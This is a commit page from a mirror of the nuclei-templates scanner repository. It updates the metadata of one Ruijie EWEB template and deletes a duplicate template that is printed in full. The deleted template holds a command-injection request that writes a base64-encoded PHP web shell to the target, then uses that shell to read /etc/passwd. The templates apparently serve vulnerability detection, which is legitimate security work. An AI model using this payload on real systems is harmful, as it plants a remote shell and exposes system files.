daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5938 from projectdiscovery/merging-templates 

Update CNVD-2021-09650.yaml
patch-1
Prince Chaddha 2022-11-01 18:57:57 +05:30 committed by GitHub
parent d8ae1ec5a3 a3f01fc9a3
commit af3aebba07
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 4 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
cnvd/2021/CNVD-2021-09650.yaml
View File

@ -1,12 +1,14 @@
id: CNVD-2021-09650 id: CNVD-2021-09650
info: info:
name: Ruijie EWEB Gateway Platform - Remote Command Injection name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo author: daffainfo,pikpikcu
severity: critical severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference: reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0 cvss-score: 10.0

43
vulnerabilities/ruijie/ruijie-networks-rce.yaml
View File

@ -1,43 +0,0 @@
id: ruijie-networks-rce
info:
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: pikpikcu
description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution.
severity: critical
reference:
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: ruijie,rce,network
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00
- |
GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "nobody:x:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03